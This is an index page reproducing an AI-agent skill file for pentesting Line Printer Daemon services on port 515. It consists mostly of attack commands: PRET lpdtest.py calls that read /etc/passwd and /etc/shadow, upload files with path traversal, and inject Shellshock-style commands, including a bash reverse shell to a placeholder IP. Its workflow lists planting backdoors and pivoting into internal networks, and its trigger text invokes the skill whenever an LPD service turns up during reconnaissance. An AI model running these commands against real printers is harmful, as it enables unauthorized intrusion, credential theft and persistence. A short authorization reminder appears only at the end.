OpenSkillIndex← back to search

Hacktricks-skills lpd-pentesting

How to pentest Line Printer Daemon (LPD) services on port 515/tcp. Use this skill whenever you need to assess printer security, test LPD/LPRng implementations, enumerate printer services, or exploit LPD vulnerabilities. Trigger this skill for any task involving port 515, printer exploitation, LPRng testing, network printer security assessments, or when you discover an LPD service during reconnaissance.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/515-pentesting-line-printer-daemon-lpd/SKILL.MD
source content

LPD Pentesting Skill

A comprehensive guide for pentesting Line Printer Daemon (LPD) services.

What is LPD?

The Line Printer Daemon (LPD) protocol operates on port 515/tcp and was developed in Berkeley Unix in the 1980s (RFC1179). It uses the 

lpr
command and works by sending:

  • Control file: Specifies job details and user information
  • Data file: Contains the actual print information

Common implementations include LPRng on Unix-like systems.

Why LPD is Vulnerable

LPD can be exploited through:

  • Malicious PostScript injection
  • PJL (Printer Job Language) command injection
  • File operations (upload/download/delete)
  • Command execution via crafted print jobs

Tools

PRET (Printer Exploitation Toolkit)

PRET provides two essential tools for LPD interaction. Install from: https://github.com/RUB-NDS/PRET

lpdprint.py - Print files to LPD printers

lpdprint.py <hostname> <filename>

lpdtest.py - Test and interact with LPD printers

# Download a file from the printer
lpdtest.py <hostname> get <path>

# Upload a file to the printer
lpdtest.py <hostname> put <local_path> <remote_path>

# Delete a file from the printer
lpdtest.py <hostname> rm <path>

# Command injection
lpdtest.py <hostname> in '() {:;}; <command>'

# Send mail through the printer
lpdtest.py <hostname> mail <email>

Common Exploitation Techniques

1. File Enumeration

Try to read sensitive files from the printer:

# Try to read sensitive files
lpdtest.py <target> get /etc/passwd
lpdtest.py <target> get /etc/shadow
lpdtest.py <target> get /etc/hosts

2. File Upload

Upload malicious files or reverse shells:

# Upload malicious files
lpdtest.py <target> put <local_file> <remote_path>

# Path traversal attempts
lpdtest.py <target> put ../../etc/passwd

3. Command Injection

Execute commands via LPD:

# Basic command injection
lpdtest.py <target> in '() {:;}; <command>'

# Example: ping for out-of-band confirmation
lpdtest.py <target> in '() {:;}; ping -c1 <your_ip>'

# Example: reverse shell
lpdtest.py <target> in '() {:;}; bash -i >& /dev/tcp/<your_ip>/<port> 0>&1'

4. Out-of-Band Communication

Send data via mail command:

# Send data via mail command
lpdtest.py <target> mail <your_email>

Finding LPD Services

Shodan Search

port 515

Nmap Scan

# Basic port scan
nmap -p 515 <target>

# With service detection
nmap -sV -p 515 <target>

# With scripts
nmap --script lpd-enum -p 515 <target>

Workflow

  1. Reconnaissance: Identify LPD services via port scanning or Shodan
  2. Enumeration: Use 
    lpdtest.py
    to probe for accessible files
  3. Exploitation: Attempt command injection or file operations
  4. Persistence: Upload backdoors or modify printer configurations
  5. Pivot: Use printer as a pivot point to internal networks

Safety Considerations

  • Only test systems you have authorization to assess
  • LPD exploitation can cause printer malfunctions
  • Some operations may be logged and trigger alerts
  • Document all findings for reporting
  • Be aware that some printers may have additional security measures

References